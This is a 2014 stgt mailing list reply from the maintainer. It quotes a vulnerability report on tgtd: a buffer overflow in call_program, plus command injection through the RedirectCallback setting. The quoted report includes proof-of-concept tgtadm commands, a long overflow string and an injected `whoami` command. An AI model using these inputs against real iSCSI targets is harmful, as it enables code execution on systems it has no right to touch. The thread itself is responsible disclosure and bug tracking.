[stgt] tgtd buffer overflow and command injection vulnerabilities

Hitoshi Mitake mitake.hitoshi at gmail.com
Fri Jun 13 04:27:38 CEST 2014 

At Tue, 10 Jun 2014 19:17:35 +0000,
Hullinger, Jason (Cloud Services) wrote:
> 
> TGT Team:
> 
> The function call_program in the tgtd daemon includes a callback function
> that will run arbitrary commands. Additionally, it does not check that the
> cmd argument is smaller than the allocated buffer size causing a buffer
> overflow. Example and proof of concept:
> 
> usr/tgtd.c
> 
> int call_program(const char *cmd, void (*callback)(void *data, int result),
> 		void *data, char *output, int op_len, int flags)
> ...
> char *pos, arg[256];
> ...
> str_spacecpy(&pos, cmd);
> 
> Where str_spacecpy (usr/tgtd.c) chops multiple white spaces into one white
> space. It takes a dest buffer and copies into a src buffer:
> 
> void str_spacecpy(char **dest, const char *src)
> 
> call_program is called from usr/target.c in get_redirect_address
> 
> static int
> get_redirect_address(char *callback, char *buffer, int buflen,
> 			char **address, char **ip_port, int *rsn)
> ...
> if (call_program(callback, NULL, NULL, buffer, buflen, 0))
> ...
> 
> Where get_redirect_address is called from usr/target.c by:
> 
> int target_redirected(struct iscsi_target *target,
> 	struct iscsi_connection *conn, char *buf, int *reason)
> ...
> char dst[INET6_ADDRSTRLEN], in_buf[1024];
>  ...
> 		ret = get_redirect_address(in_buf, buffer,
> 					sizeof(buffer), &addr, &port, &rsn);
> ...
> 
> in_buf, size 1024, is passed to call_program as 'cmd', which then copies
> into the dest char buffer of size 256 causing a buffer overflow.
> 
> In addition to that, any arbitrary command line argument that is pass in
> by tgtadm will be executed. Example:
> 
> sudo tgtd -C 1 --iscsi portal=127.0.0.1:860
> sudo ./scripts/tgt-admin -C 1  -e -c /home/ubuntu/tgt/targets.confg
> 
> (in a different shell) sudo gdb --args tgtd -f -C 2 --iscsi
> portal=127.0.0.1
> sudo ./scripts/tgt-admin -C 2  -e -c /home/ubuntu/tgt/targets.confg
> 
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectAddress
> --value 127.0.0.1
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectPort
> --value 860
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectReason
> --value Temporary
> 
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
> --value 
> 1zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
> 
> sudo iscsiadm -m discovery -t st -p 127.0.0.1
> sudo iscsiadm -m node -p 127.0.0.1 -l
> 
> Upon attempting to authenticate, the command set by the --name
> RedirectCallback --value tgtadm directive will attempt to be executed. If
> you replace the above example with:
> 
> sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
> --value "/usr/bin/logger `whoami`"
> 
> You will see in the syslog file, where 'ubuntu' is the current user:
> 
> ubuntu iqn.2014-05.local.localhost:foobar 127.0.0.1
> 
> I'm a bit unclear as to what exactly is suppose to happen here, or what
> the intended result is, but it seems that arbitrary commands should not be
> allowed to be injected from tgtadm in addition to checking the strlen of
> cmd.
> 
> Thanks, and let me know if I can answer or clarify any questions.

I'm still not digging in the problem, but it seems to be very
important. I added a new issue in the launchpad tracker:

https://bugs.launchpad.net/tgt-project/+bug/1329586

I'd like to fix it when I can allocate time for it, or have you
already created a patch for it?

Thanks,
Hitoshi

> 
> Jason Hullinger
> 
> Security Architect
> HP Helion Cloud
> 
> --
> To unsubscribe from this list: send the line "unsubscribe stgt" in
> the body of a message to majordomo at vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
--
To unsubscribe from this list: send the line "unsubscribe stgt" in
the body of a message to majordomo at vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

More information about the stgt mailing list